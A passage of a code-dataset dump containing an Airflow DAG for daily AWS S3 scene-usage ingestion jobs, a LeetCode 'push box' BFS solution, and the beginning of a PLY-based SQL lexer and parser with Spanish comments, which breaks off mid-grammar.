}\n\n","sub_path":"coursebuilder/tools/etl/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"582236891","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\naws scene usage stats dag\n\"\"\"\n\n# The DAG object; we'll need this to instantiate a DAG\nfrom airflow import DAG\nfrom airflow.operators.dummy import DummyOperator\nfrom datetime import datetime as dt, timedelta\nfrom automated_reporting import k8s_secrets, utilities\n\ndefault_args = {\n \"owner\": utilities.REPORTING_OWNERS,\n \"depends_on_past\": False,\n \"start_date\": dt(2022, 4, 29),\n \"email\": utilities.REPORTING_ADMIN_EMAILS,\n \"email_on_failure\": True,\n \"email_on_retry\": False,\n \"retries\": 1,\n \"retry_delay\": timedelta(minutes=5),\n}\n\ndag = DAG(\n \"rep_aws_scene_usage_stats_prod\",\n description=\"DAG for aws scene usage stats prod\",\n tags=[\"reporting\"],\n default_args=default_args,\n schedule_interval=\"0 14 * * *\", # daily at 1am AEDT\n)\n\nENV = \"prod\"\nETL_IMAGE = (\n \"538673716275.dkr.ecr.ap-southeast-2.amazonaws.com/ga-reporting-etls:v2.27.7\"\n)\n\n\nwith dag:\n START = DummyOperator(task_id=\"aws-scene-usage-stats\")\n aws_s3_raw_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo raw scene usage ingestion: $(date)\",\n \"s3-usage-raw-ingestion\",\n ],\n task_id=\"aws_s3_raw_scene_usage_ingestion\",\n env_vars={\n \"REPORTING_DATE\": \"{{ ds }}\",\n },\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n aws_s3_year_wise_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo year-wise scene usage ingestion processing: $(date)\",\n \"parse-uri ${REP_DB_URI} /tmp/env; source /tmp/env\",\n \"s3-usage-year-ingestion\",\n ],\n task_id=\"aws_s3_year_wise_scene_usage_ingestion\",\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n aws_s3_region_wise_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo region-wise scene usage ingestion processing: $(date)\",\n \"parse-uri ${REP_DB_URI} /tmp/env; source /tmp/env\",\n \"s3-usage-region-ingestion\",\n ],\n task_id=\"aws_s3_region_wise_scene_usage_ingestion\",\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n aws_s3_ip_requester_wise_scene_usage_ingestion = utilities.k8s_operator(\n dag=dag,\n image=ETL_IMAGE,\n cmds=[\n \"echo ip-requester-wise scene usage ingestion processing: $(date)\",\n \"parse-uri ${REP_DB_URI} /tmp/env; source /tmp/env\",\n \"s3-usage-ip-requester-ingestion\",\n ],\n task_id=\"aws_s3_ip_requester_wise_scene_usage_ingestion\",\n secrets=k8s_secrets.db_secrets(ENV)\n + k8s_secrets.s3_server_access_log_bucket\n + k8s_secrets.iam_dea_secrets,\n )\n START >> aws_s3_raw_scene_usage_ingestion\n START >> aws_s3_year_wise_scene_usage_ingestion\n START >> aws_s3_region_wise_scene_usage_ingestion\n START >> aws_s3_ip_requester_wise_scene_usage_ingestion\n","sub_path":"dags/automated_reporting/rep_aws_scene_usage_stats_prod.py","file_name":"rep_aws_scene_usage_stats_prod.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"257755949","text":"'''\nAuthor: Puffrora\nDate: 2021-01-25 22:36:24\nLastModifiedBy: Puffrora\nLastEditTime: 2021-01-25 23:26:21\n'''\n\n\nclass Solution:\n def minPushBox(self, grid):\n\n from collections import deque\n\n row, col = len(grid), len(grid[0])\n tar, box, player = None, None, None\n for i in range(row):\n for j in range(col):\n if grid[i][j] == 'T':\n tar = (i, j)\n grid[i][j] = '.'\n elif grid[i][j] == 'B':\n box = (i, j)\n grid[i][j] = '.'\n elif grid[i][j] == 'S':\n player = (i, j)\n grid[i][j] = '.'\n if tar and box and player:\n break\n \n def get_neighbor(cur_box):\n nonlocal row, col\n x, y = cur_box\n res = []\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n if 0 <= x+dx < row and 0 <= y+dy < col and grid[x+dx][y+dy] == '.':\n res.append((x+dx, y+dy))\n return res\n\n def get_next_state(cur_box, cur_player):\n neighbors = get_neighbor(cur_box)\n\n q1 = deque([cur_player])\n reachable = []\n visited = set([cur_player])\n while q1:\n for _ in range(len(q1)):\n x, y = q1.popleft()\n if (x, y) in neighbors:\n reachable.append((x, y))\n \n for nx, ny in get_neighbor((x, y)):\n if (nx, ny) not in visited and (nx, ny) != cur_box:\n visited.add((nx, ny))\n q1.append((nx, ny))\n \n next_state = []\n bx, by = cur_box\n for rx, ry in reachable:\n symmetry_x, symmetry_y = 2 * bx - rx, 2 * by - ry\n if 0 <= symmetry_x < row and 0 <= symmetry_y < col and grid[symmetry_x][symmetry_y] == '.':\n next_state.append(((symmetry_x, symmetry_y), cur_box))\n return next_state\n\n\n queue = deque([(box, player)])\n seen = set([(box, player)])\n step = -1\n while queue:\n step += 1\n for _ in range(len(queue)):\n cur_box, cur_player = queue.popleft()\n if cur_box == tar:\n return step\n \n for n_box, n_player in get_next_state(cur_box, cur_player):\n if (n_box, n_player) not in seen:\n seen.add((n_box, n_player))\n queue.append((n_box, n_player))\n \n return -1\n\n\n","sub_path":"Leetcode/leetcode1263 推箱子.py","file_name":"leetcode1263 推箱子.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"46158685","text":"# ======================================================================\n# IMPORTES Y PLY\n# ======================================================================\n#importamos la libreria PLY para hacer nuestro analizador lexico.\nimport ply.lex as lex\n#importamos la libreria para llamar al parcer de PLY\nimport ply.yacc as yacc\n#importamos mas librerias que seran utilizadas en el analizador.\n#Estas librerias son compatibles con la licencia ya que son librerias propias de python\nimport re\nimport codecs\nimport os\nimport sys\n# ======================================================================\n# ENTORNO Y PRINCIPAL\n# ======================================================================\nfrom execution.symbol.environment import Environment\nfrom TypeChecker.Database_Types import *\nfrom execution.symbol.typ import *\nfrom execution.main import Main\nfrom execution.symbol.error import *\nTokenError = list()\nListaIndices = list()\nListaAux = list()\n\n# ======================================================================\n# INSTRUCCIONES DDL\n# ======================================================================\nfrom execution.querie.use import Use\nfrom execution.querie.create import Create\nfrom execution.querie.show_database import Show_Database\nfrom execution.querie.drop_database import Drop_Database\nfrom execution.querie.alter_database import Alter_Database\nfrom execution.querie.add_column import Add_Column\nfrom execution.querie.add_constraint import Add_Constraint\nfrom execution.querie.alter_column import Alter_Column\nfrom execution.querie.alter_table import Alter_Table\nfrom execution.querie.case import Case\nfrom execution.querie.create_t import Create_Table\nfrom execution.querie.create_type import Create_Type\nfrom execution.querie.drop_column import Drop_Column\nfrom execution.querie.drop_constraint import Drop_Constraint\nfrom execution.querie.drop_database import Drop_Database\nfrom execution.querie.drop_t import Drop_Table\nfrom execution.querie.select_fun import Select_Func\n\nfrom execution.symbol.column import Column\n\n# ======================================================================\n# INSTRUCCIONES DML\n# ======================================================================\nfrom execution.querie.insert import Insert\nfrom execution.querie.update import Update\nfrom execution.querie.select_ import Select\nfrom execution.querie.delete import Delete\n\n# ======================================================================\n# EXPRESIONES\n# ======================================================================\nfrom execution.expression.arithmetic import Arithmetic\nfrom execution.expression.greatest import Greatest\nfrom execution.expression.id import Id\nfrom execution.expression.least import Least\nfrom execution.expression.literal import Literal\nfrom execution.expression.neg import Neg\nfrom execution.expression.logic import Logic\nfrom execution.expression.predicates import Predicates\nfrom execution.expression.relational import Relational\nfrom execution.expression.stringop import Stringop\n\n# ======================================================================\n# FUNCIONES MATEMATICAS\n# ======================================================================\nfrom execution.function.mathematical.abs import Abs\nfrom execution.function.mathematical.cbrt import Cbrt\nfrom execution.function.mathematical.ceil import Ceil\nfrom execution.function.mathematical.ceiling import Ceiling\nfrom execution.function.mathematical.degrees import Degrees\nfrom execution.function.mathematical.div import Div\nfrom execution.function.mathematical.exp import Exp\nfrom execution.function.mathematical.factorial import Factorial\nfrom execution.function.mathematical.floor import Floor\nfrom execution.function.mathematical.gcd import Gcd\nfrom execution.function.mathematical.ln import Ln\nfrom execution.function.mathematical.log import Log\nfrom execution.function.mathematical.pi import Pi\nfrom execution.function.mathematical.power import Power\nfrom execution.function.mathematical.radians import Radians\nfrom execution.function.mathematical.random import Randomic\nfrom execution.function.mathematical.round import Round\nfrom execution.function.mathematical.sign import Sign\nfrom execution.function.mathematical.sqrt import Sqrt\nfrom execution.function.mathematical.trunc import Trunc\nfrom execution.function.mathematical.mod import Mod\nfrom execution.function.mathematical.width_bucket import Width_Bucket\n# ======================================================================\n# FUNCIONES TRIGONOMETRICAS\n# ======================================================================\nfrom execution.function.trigonometric.acos import Acos\nfrom execution.function.trigonometric.acosd import Acosd\nfrom execution.function.trigonometric.acosh import Acosh\nfrom execution.function.trigonometric.asin import Asin\nfrom execution.function.trigonometric.asind import Asind\nfrom execution.function.trigonometric.asinh import Asinh\nfrom execution.function.trigonometric.atan import Atan\nfrom execution.function.trigonometric.atan2 import Atan2\nfrom execution.function.trigonometric.atan2d import Atan2d\nfrom execution.function.trigonometric.atand import Atand\nfrom execution.function.trigonometric.atanh import Atanh\nfrom execution.function.trigonometric.cos import Cos\nfrom execution.function.trigonometric.cosd import Cosd\nfrom execution.function.trigonometric.cosh import Cosh\nfrom execution.function.trigonometric.cot import Cot\nfrom execution.function.trigonometric.cotd import Cotd\nfrom execution.function.trigonometric.sin import Sin\nfrom execution.function.trigonometric.sind import Sind\nfrom execution.function.trigonometric.sinh import Sinh\nfrom execution.function.trigonometric.tan import Tan\nfrom execution.function.trigonometric.tand import Tand\nfrom execution.function.trigonometric.tanh import Tanh\n\n# ======================================================================\n# FUNCIONES DE AGREGADO\n# ======================================================================\nfrom execution.function.agreggates.avg import Avg\nfrom execution.function.agreggates.count import Count\nfrom execution.function.agreggates.max import Max\nfrom execution.function.agreggates.min import Min\nfrom execution.function.agreggates.sum import Sum\n\n# ======================================================================\n# FUNCIONES BINARIAS\n# ======================================================================\nfrom execution.function.binary.get_byte import Get_Byte\nfrom execution.function.binary.length import Length\nfrom execution.function.binary.md5 import Md5\nfrom execution.function.binary.set_byte import Set_Byte\nfrom execution.function.binary.sha256 import Sha256\nfrom execution.function.binary.substr import Substr\nfrom execution.function.binary.substring import Substring\nfrom execution.function.binary.trim import Trim\n\n# ======================================================================\n# FUNCIONES DE TIEMPO\n# ======================================================================\nfrom execution.function.time.current_date import Current_Date\nfrom execution.function.time.current_time import Current_Time\nfrom execution.function.time.date_part import Date_Part\nfrom execution.function.time.extract import Extract\nfrom execution.function.time.now import Now\n\n# creamos la lista de tokens de nuestro lenguaje.\nreservadas = ['SMALLINT','INTEGER','BIGINT','DECIMAL','NUMERIC','REAL','DOBLE','PRECISION','MONEY',\n 'VARYING','VARCHAR','CHARACTER','CHAR','TEXT',\n 'TIMESTAMP','DATE','TIME','INTERVAL',\n 'YEAR','MONTH','DAY','HOUR','MINUTE','SECOND',\n 'BOOLEAN',\n 'CREATE','TYPE','AS','ENUM','USE',\n 'BETWEEN','LIKE','ILIKE','SIMILAR','ON','INTO','TO',\n 'IS','ISNULL','NOTNULL',\n 'NOT','AND','OR',\n 'REPLACE','DATABASE','DATABASES','IF','EXISTS','OWNER','MODE','SELECT','EXIST',\n 'ALTER','DROP','RENAME','SHOW','ADD','COLUMN','DELETE','FROM',\n 'INSERT','VALUES','UPDATE','SET','GROUP','BY','HAVING','ORDER',\n 'RETURNING','USING','DISTINCT',\n 'TABLE','CONSTRAINT','NULL','CHECK','UNIQUE',\n 'PRIMARY','KEY','REFERENCES','FOREIGN',\n 'FALSE','TRUE','UNKNOWN','SYMMETRIC','SUBSTRING',\n 'ALL','SOME','ANY','INNER','JOIN','LEFT','RIGTH','FULL','OUTER','NATURAL',\n 'ASC','DESC','FIRST','LAST','NULLS',\n 'CASE','WHEN','THEN','ELSE','END','LIMIT',\n 'UNION','INTERSECT','EXCEPT','OFFSET','GREATEST','LEAST','WHERE','DEFAULT','CASCADE','NO','ACTION',\n 'COUNT','SUM','AVG','MAX','MIN',\n 'ABS','CBRT','CEIL','CEILING','DEGREES','DIV','EXP','FACTORIAL','FLOOR','GCD','IN','LN','LOG','MOD','PI','POWER','ROUND',\n 'ACOS','ACOSD','ASIN','ASIND','ATAN','ATAND','ATAN2','ATAN2D','COS','COSD','COT','COTD','SIN','SIND','TAN','TAND',\n 'SINH','COSH','TANH','ASINH','ACOSH','ATANH',\n 'DATE_PART','NOW','EXTRACT','CURRENT_TIME','CURRENT_DATE',\n 'LENGTH','TRIM','GET_BYTE','MD5','SET_BYTE','SHA256','SUBSTR','CONVERT','ENCODE','DECODE','DOUBLE','INHERITS','SQRT','SIGN',\n 'TRUNC','RADIANS','RANDOM','WIDTH_BUCKET'\n ,'BEGIN','DECLARE','PROCEDURE','LANGUAJE','PLPGSSQL','CALL','INDEX','HASH','INCLUDE','COLLATE', 'CONSTANT', 'ALIAS', 'FOR', 'RETURN', 'NEXT', 'ELSIF',\n 'ROWTYPE', 'RECORD', 'QUERY', 'STRICT', 'PERFORM', 'VAR', 'EXECUTE',\n 'FUNCTION','LANGUAGE','RETURNS','ANYELEMENT','ANYCOMPATIBLE','VOID'\n \n ]\n\ntokens = reservadas + ['FECHA_HORA','FECHA','HORA','PUNTO','PUNTO_COMA','CADENASIMPLE','COMA','SIGNO_IGUAL','PARABRE','PARCIERRE','SIGNO_MAS','SIGNO_MENOS',\n 'SIGNO_DIVISION','SIGNO_POR','NUMERO','NUM_DECIMAL','CADENA','ID','LLAVEABRE','LLAVECIERRE','CORCHETEABRE',\n 'CORCHETECIERRE','DOBLE_DOSPUNTOS','SIGNO_POTENCIA','SIGNO_MODULO','MAYORQUE','MENORQUE',\n 'MAYORIGUALQUE','MENORIGUALQUE',\n 'SIGNO_PIPE','SIGNO_DOBLE_PIPE','SIGNO_AND','SIGNO_VIRGULILLA','SIGNO_NUMERAL','SIGNO_DOBLE_MENORQUE','SIGNO_DOBLE_MAYORQUE',\n 'F_HORA','COMILLA','SIGNO_MENORQUE_MAYORQUE','SIGNO_NOT','DOSPUNTOS','DOLAR',\n 'DOLAR_LABEL'\n ]\n\n\n# lista para definir las expresiones regulares que conforman los tokens.\nt_ignore = '\\t\\r '\n\nt_SIGNO_DOBLE_PIPE = r'\\|\\|'\nt_SIGNO_PIPE = r'\\|'\nt_SIGNO_AND = r'\\&'\nt_SIGNO_VIRGULILLA = r'\\~'\nt_SIGNO_NUMERAL = r'\\#'\nt_SIGNO_DOBLE_MENORQUE = r'\\<\\<'\nt_SIGNO_DOBLE_MAYORQUE = r'\\>\\>'\nt_SIGNO_MENORQUE_MAYORQUE = r'\\<\\>'\nt_SIGNO_NOT = r'\\!\\='\n\nt_PUNTO= r'\\.'\nt_PUNTO_COMA = r'\\;'\nt_COMA = r'\\,'\nt_SIGNO_IGUAL = r'\\='\nt_PARABRE = r'\\('\nt_PARCIERRE = r'\\)'\nt_SIGNO_MAS = r'\\+'\nt_SIGNO_MENOS = r'\\-'\nt_SIGNO_DIVISION = r'\\/'\nt_SIGNO_POR= r'\\*'\nt_LLAVEABRE = r'\\{'\nt_LLAVECIERRE = r'\\}'\nt_CORCHETEABRE = r'\\['\nt_CORCHETECIERRE = r'\\]'\nt_DOBLE_DOSPUNTOS= r'\\:\\:'\nt_DOSPUNTOS= r'\\:'\nt_SIGNO_POTENCIA = r'\\^'\nt_SIGNO_MODULO = r'\\%'\nt_MAYORIGUALQUE = r'\\>\\='\nt_MENORIGUALQUE = r'\\<\\='\nt_MAYORQUE = r'\\>'\nt_MENORQUE = r'\\<'\nt_COMILLA = r'\\''\nt_DOLAR= r'\\$'\n\ndef t_DOLAR_LABEL(t):\n r'\\$.*?\\$'\n return t\n\n\n# expresion regular para los id´s\ndef t_ID (t):\n r'[a-zA-Z_][a-zA-Z0-9_]*'\n if t.value.upper() in reservadas:\n t.value = t.value.upper()\n t.type = t.value \n return t\n\n# expresion regular para comentario de linea\ndef t_COMMENT(t):\n r'--.*'\n t.lexer.lineno += 1\n\n# expresion regular para comentario de linea\ndef t_COMMENT_MULT(t):\n r'/\\*(.|\\n)*?\\*/'\n t.lexer.lineno += t.value.count('\\n')\n\ndef t_NUM_DECIMAL(t):\n r'\\d+\\.\\d+'\n t.value = float(t.value)\n return t\n \n# expresion regular para reconocer numeros\ndef t_NUMERO(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n# expresion regular para reconocer formato hora\ndef t_F_HORA(t):\n r'\\'\\s*(\\d+\\s+(hours|HOURS))?(\\s*\\d+\\s+(minutes|MINUTES))?(\\s*\\d+\\s+(seconds|SECONDS))?\\s*\\''\n t.value = t.value[1:-1]\n return t\n\n# expresion regular para reconocer fecha_hora\ndef t_FECHA_HORA(t):\n r'\\'\\d+-\\d+-\\d+\\s\\d+:\\d+:\\d+\\''\n t.value = t.value[1:-1]\n from datetime import datetime\n try:\n t.value = datetime.strptime(t.value,'%Y-%m-%d %H:%M:%S')\n except ValueError:\n t.value = datetime(1900,1,1)\n return t\n\ndef t_FECHA(t):\n r'\\'\\d\\d\\d\\d-\\d\\d-\\d\\d\\''\n t.value = t.value[1:-1]\n from datetime import datetime\n try:\n t.value = datetime.strptime(t.value,'%Y-%m-%d')\n except ValueError:\n t.value = datetime(1900,1,1)\n return t\n\n\ndef t_HORA(t):\n r'\\'\\d+:\\d+:\\d+\\''\n t.value = t.value[1:-1]\n from datetime import datetime\n try:\n t.value = datetime.strptime(t.value,'%H:%M:%S')\n except ValueError:\n t.value = datetime(1900,1,1)\n return t\n\n\ndef t_CADENASIMPLE(t):\n r'\\'(\\s*|.*?)\\''\n t.value = str(t.value)\n return t\n \n# expresion regular para reconocer cadenas\ndef t_CADENA(t):\n r'\\\"(\\s*|.*?)\\\"'\n t.value = str(t.value)\n return t\n\n# expresion regular para saltos de linea\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n# expresion regular para reconocer errores\ndef t_error(t):\n err = T_error('LEXICO', t.value, 'TOKEN DESCONOCIDO', str(t.lineno), str(t.lexpos))\n TokenError.append(err)\n t.lexer.skip(1)\n\n# fin de las expresiones regulares para reconocer nuestro lenguaje.\n\nanalizador = lex.lex()\n\n# funcion para realizar el analisis lexico de nuestra entrada\ndef analizarLex(texto): \n analizador.input(texto)# el parametro cadena, es la cadena de texto que va a analizar.\n\n #ciclo para la lectura caracter por caracter de la cadena de entrada.\n textoreturn = \"\"\n while True:\n tok = analizador.token()\n if not tok : break\n #print(tok)\n textoreturn += str(tok) + \"\\n\"\n return textoreturn \n\n\n ######### inicia el analizador Sintactico ##########\n\n # Asociación de operadores y precedencia\n\n #FALTAN ALGUNOS SIGNOS/PALABRAS RESERVADAS EN LA PRECEDENCIA\nprecedence = (\n ('left','OR'),\n ('left','AND'),\n ('left','MAYORIGUALQUE','MENORIGUALQUE','MAYORQUE','MENORQUE'),\n ('left','SIGNO_MAS','SIGNO_MENOS'),\n ('left','SIGNO_POR','SIGNO_DIVISION'),\n ('left','SIGNO_POTENCIA','SIGNO_MODULO'), \n ('right','UMENOS')\n ) \n\n\n# Definición de la gramática\ndef p_inicio(t):\n '''inicio : instrucciones '''\n #envGlobal = Environment(None)\n #iniciarEjecucion = Main(t[1])\n #iniciarEjecucion.call(envGlobal)\n t[0] = t[1] \n\ndef p_instrucciones_lista(t):\n '''instrucciones : instrucciones instruccion \n | instruccion '''\n if len(t) == 3:\n t[1].append(t[2])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_instrucciones_evaluar(t):\n '''instruccion : ins_use\n | ins_show\n | ins_alter\n | ins_drop\n | ins_create\n | ins_insert\n | ins_select\n | ins_update\n | ins_delete\n | exp\n | ins_create_pl\n | instruccion_if\n | instruccion_case\n | create_index'''\n t[0] = t[1]\n\ndef p_instruccion_use(t):\n '''ins_use : USE ID PUNTO_COMA'''\n t[0] = Use(t[2], t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_instruccion_show(t):\n '''ins_show : SHOW DATABASES PUNTO_COMA'''\n t[0] = Show_Database(t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_instruccion_create(t):\n '''ins_create : CREATE tipo_create'''\n t[0] = t[2] \n\ndef p_tipo_create(t):\n '''tipo_create : ins_replace DATABASE if_exists ID create_opciones PUNTO_COMA\n | TABLE ID PARABRE definicion_columna PARCIERRE ins_inherits PUNTO_COMA\n | TYPE ID AS ENUM PARABRE list_vls PARCIERRE PUNTO_COMA'''\n if t[1] == 'TYPE':\n t[0] = Create_Type(t[2], t[5], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'TABLE':\n arreglo = []\n for item in t[4]:\n for i in item:\n arreglo.append(i)\n\n t[0] = Create_Table(t[2], arreglo,t[6], t.slice[1].lexpos, t.slice[1].lineno)\n else:\n t[0] = Create(t[1], 0, t[4], t.slice[2].lexpos, t.slice[2].lineno)\n\ndef p_definicion_columna(t):\n '''definicion_columna : definicion_columna COMA columna \n | columna ''' # no se *** si va la coma o no\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_columna(t):\n '''columna : ID tipo_dato definicion_valor_defecto ins_constraint\n | primary_key \n | foreign_key \n | unique'''\n if len(t) == 2:\n t[0] = t[1]\n else:\n columna = []\n columna.append( Column(t[1], t[2]['type'], t[3], t[2]['length']))\n\n for item in t[4]:\n if 'name' not in item:\n if item['type'] == 'primary':\n item['name'] = 'pk_' + t[1]\n if item['type'] == 'not null':\n item['name'] = 'nn_' + t[1]\n if item['type'] == 'unique':\n item['name'] = 'uq_' + t[1]\n if item['type'] == 'foreign':\n item['name'] = 'fk_' + t[1]\n if item['type'] == 'check':\n item['name'] = 'ch_' + t[1]\n if item['type'] != 'check':\n item['value'] = t[1]\n columna.append(item)\n t[0] = columna\n\n#TODO: HERENCIA\ndef p_ins_inherits(t):\n '''ins_inherits : INHERITS PARABRE ID PARCIERRE\n | ''' #EPSILON\n if len(t) > 1:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_unique(t):\n ''' unique : UNIQUE PARABRE nombre_columnas PARCIERRE '''\n if isinstance(t[3],list):\n ids = []\n for item in t[3]:\n ids.append({'type': 'unique', 'name': 'uq_'+item, 'value': item})\n t[0] = ids\n else:\n t[0] = [{'type': 'unique', 'name': 'uq_'+t[3], 'value': t[3]}]\n\ndef p_primary_key(t):\n '''primary_key : PRIMARY KEY PARABRE nombre_columnas PARCIERRE ins_references'''\n if isinstance(t[4],list):\n ids = []\n for item in t[4]:\n ids.append({'type': 'primary', 'name': 'pk_'+item, 'value': item})\n t[0] = ids\n else:\n t[0] = [{'type': 'primary', 'name': 'pk_'+t[4], 'value': t[4]}]\n \ndef p_foreign_key(t):\n '''foreign_key : FOREIGN KEY PARABRE nombre_columnas PARCIERRE REFERENCES ID PARABRE nombre_columnas PARCIERRE ins_references'''\n \n if isinstance(t[4],list):\n ids = []\n posicion = t[4]\n reference = t[9]\n for i in range(len(posicion)):\n ids.append({'type': 'foreign', 'name':'fk_'+posicion[i], 'value': posicion[i], 'references': reference[i]})\n t[0] = ids\n else:\n t[0] = [{'type': 'foreign', 'name':'fk_'+t[4], 'value': t[4], 'references': t[9]}]\n\ndef p_nombre_columnas(t):\n '''nombre_columnas : nombre_columnas COMA ID \n | ID '''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n arreglo = []\n arreglo.append(t[1])\n t[0] = arreglo\n\ndef p_tipo_dato(t):\n '''tipo_dato : SMALLINT \n | BIGINT\n | NUMERIC\n | DECIMAL PARABRE NUMERO COMA NUMERO PARCIERRE\n | INTEGER\n | REAL\n | DOUBLE PRECISION\n | CHAR PARABRE NUMERO PARCIERRE\n | VARCHAR PARABRE NUMERO PARCIERRE\n | CHARACTER PARABRE NUMERO PARCIERRE\n | TEXT\n | TIMESTAMP arg_precision\n | TIME arg_precision\n | DATE\n | INTERVAL arg_tipo arg_precision\n | BOOLEAN\n | MONEY'''\n if t.slice[1].type == 'SMALLINT':\n t[0] = {'type':DBType.smallint, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'BIGINT':\n t[0] = {'type':DBType.bigint, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'NUMERIC':\n t[0] = {'type':DBType.numeric, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'DECIMAL':\n t[0] = {'type':DBType.decimal, 'length': -1, 'default':0.0 }\n elif t.slice[1].type == 'INTEGER':\n t[0] = {'type':DBType.integer, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'REAL':\n t[0] = {'type':DBType.real, 'length': -1, 'default':0.0 }\n elif t.slice[1].type == 'DOUBLE':\n t[0] = {'type':DBType.double_precision, 'length': -1, 'default':0.0 }\n elif t.slice[1].type == 'TEXT':\n t[0] = {'type':DBType.text, 'length': -1, 'default':\"\" }\n elif t.slice[1].type == 'DATE':\n t[0] = {'type':DBType.date, 'length': -1, 'default':\"2000-01-01\" }\n elif t.slice[1].type == 'BOOLEAN':\n t[0] = {'type':DBType.boolean, 'length': -1, 'default':False }\n elif t.slice[1].type == 'MONEY':\n t[0] = {'type':DBType.money, 'length': -1, 'default':0.0 }\n \n elif t.slice[1].type == 'TIMESTAMP':\n t[0] = {'type':DBType.timestamp_wtz, 'length': t[2], 'default':\"2000-01-01\" }\n elif t.slice[1].type == 'TIME':\n t[0] = {'type':DBType.time_wtz, 'length': t[2], 'default':\"00:00:01\" }\n elif t.slice[1].type == 'INTERVAL':\n t[0] = {'type':DBType.interval, 'length': -1, 'default':\"1 HOUR 1 MINUTE 1 SECOND\" }\n\n elif t.slice[1].type == 'CHAR':\n t[0] = {'type':DBType.char, 'length':t[3], 'default':\"\" }\n elif t.slice[1].type == 'VARCHAR':\n t[0] = {'type':DBType.varchar, 'length':t[3], 'default':\"\" }\n elif t.slice[1].type == 'CHARACTER':\n t[0] = {'type':DBType.character, 'length':t[3], 'default':\"\" }\n\ndef p_arg_precision(t):\n '''arg_precision : PARABRE NUMERO PARCIERRE \n | ''' #epsilon\n if len(t) == 4:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_arg_tipo(t):\n '''arg_tipo : MONTH\n | YEAR\n | HOUR\n | MINUTE\n | SECOND \n | '''\n if len(t) == 2:\n t[0] = t[1]\n else:\n t[0] = None\n\ndef p_definicion_valor_defecto(t):\n '''definicion_valor_defecto : DEFAULT tipo_default \n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_ins_constraint(t):\n '''ins_constraint : ins_constraint constraint restriccion_columna \n | restriccion_columna\n |''' #epsilon\n if len(t) > 2:\n if t[2] != None:\n diccionario = t[3]\n diccionario['name'] = t[2]\n t[1].append(diccionario)\n else:\n t[1].append(t[3])\n t[0] = t[1]\n elif len(t) == 2:\n t[0] = [t[1]]\n else:\n t[0] = []\n\ndef p_constraint(t):\n '''constraint : CONSTRAINT ID \n | '''\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_restriccion_columna(t):\n '''restriccion_columna : NOT NULL \n | SET NOT NULL \n | PRIMARY KEY \n | UNIQUE \n | NULL \n | CHECK PARABRE exp PARCIERRE \n ''' #cambio del condicion columna\n \n if t.slice[1].type== 'UNIQUE' :\n t[0] = {'type':'unique'}\n elif t.slice[1].type == 'NULL' :\n t[0] = {'type' : 'null' }\n elif t.slice[1].type == 'NOT' and t.slice[2].type == 'NULL':\n t[0] = {'type' : 'not null' }\n print(\"entra not null\")\n elif t.slice[1].type == 'PRIMARY' and t.slice[2].type == 'KEY':\n print(\"entra primary\")\n t[0] = {'type':'primary'}\n elif t.slice[1].type == 'CHECK' :\n t[0] = {'type':'check', 'value': t[3]}\n\n\n\ndef p_references(t):\n '''ins_references : ON DELETE accion ins_references\n | ON UPDATE accion ins_references\n | '''\n\ndef p_accion(t):\n '''accion : CASCADE\n | SET NULL\n | SET DEFAULT\n | NO ACTION'''\n\ndef p_tipo_default(t): #ESTE NO SE SI SON RESERVADAS O LOS VALORES\n '''tipo_default : NUMERO\n | NUM_DECIMAL\n | CADENASIMPLE\n | CADENA\n | TRUE\n | FALSE\n | FECHA\n | FECHA_HORA\n | NULL\n | '''\n t[0] = t[1]\n \ndef p_ins_replace(t): \n '''ins_replace : OR REPLACE\n | '''#EPSILON\n if len(t) ==3:\n t[0] = True\n else: \n t[0] = False\n\ndef p_if_exists(t): \n '''if_exists : IF NOT EXISTS\n | IF EXISTS\n | ''' # EPSILON\n\ndef p_create_opciones(t): \n '''create_opciones : OWNER SIGNO_IGUAL user_name create_opciones\n | MODE SIGNO_IGUAL NUMERO create_opciones\n | '''\n if len(t) == 5:\n if t[1] == 'MODE':\n t[0] = t[3]\n else:\n t[0] = 0\n else: \n t[0] = 0\n\ndef p_user_name(t):\n '''user_name : ID\n | CADENA \n | CADENASIMPLE'''\n t[0] = t[1]\n\ndef p_alter(t): \n '''ins_alter : ALTER tipo_alter ''' \n t[0] = t[2]\n\ndef p_tipo_alter(t): \n '''tipo_alter : DATABASE ID alter_database PUNTO_COMA\n | TABLE ID alteracion_tabla PUNTO_COMA''' # NO SE 